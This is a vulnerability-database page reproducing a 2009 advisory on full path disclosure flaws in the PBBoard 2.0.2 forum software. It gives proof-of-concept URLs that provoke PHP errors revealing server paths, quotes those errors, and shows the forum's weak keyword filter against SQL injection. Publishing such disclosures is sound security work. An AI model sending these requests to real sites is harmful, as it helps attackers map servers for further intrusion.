Lucene search
K

PBBoard <=2.0.2 Full Path Disclosure

🗓️ 08 Oct 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

PBBoard <=2.0.2 Full Path Disclosure in PH

Code

                                                Advisory]PBBoard &lt;=2.0.2 - Full Path Disclosure
Details
=======
Product: PHP &lt;= PBBoard
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.pbboard.com

Credits
============
Discovered by: rUnViRuS
site: http://www.sec-area.com

Affected Products:
----------------------------
test on PBBoard 2.0.2
maybe work under 2.0.2 

More Details
============
1. Full Path Disclosure
-----------------------------------
allow attackers to gather the real path of the server side script.

Proof of concept:
http://www.[xxxxx].com/path/index.php?page=new_topic&amp;index=1&amp;id=union

error
Fatal error: Call to undefined method PowerBBLocalCommon::error() in \
/home/xxx/public_html/vb/common.php on line 193

code :
// Check if $_GET don't value any SQL Injection
foreach ($PowerBB-&gt;_GET as $sql_get)
{
if ((eregi(&quot;select&quot;, $sql_get)) or
(eregi(&quot;union&quot;, $sql_get)) or
(eregi(&quot;%&quot;, $sql_get)))
{
$this-&gt;error('&amp;#1592;‚&amp;#1592;…&amp;#1591;&amp;#1726; \
&amp;#1591;¨&amp;#1591;¹&amp;#1592;…&amp;#1592;„&amp;#1592;&amp;#1657;&amp;#1592;‡ \
&amp;#1591;&amp;#1563;&amp;#1592;&amp;#1657;&amp;#1591;± \
&amp;#1592;…&amp;#1591;´&amp;#1591;±&amp;#1592;ˆ&amp;#1591;¹&amp;#1592;‡!'); }
}
================
================
2. Full Path Disclosure
-----------------------------------
allow attackers to gather the real path of the server side script.

Proof of concept:
http://www.[xxxx].com/[path]/index.php?page=search&amp;start=1&amp;keyword=§ion=all&amp;search=1

Warning: filesize() [function.filesize]: stat failed for show_msg in \
/home/xxxxx/public_html/vb/includes/template.class.php on line 99

Fatal error: ERROR::FILE_SIZE_IS_ZERO in \
/home/xxxxx/public_html/vb/includes/template.class.php on line 146

--------------------------------------------------
[W]orld [D]efacers [T]eam
http://www.Sec-area.com
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Oct 2009 00:00Current
7.1High risk
Vulners AI Score7.1
10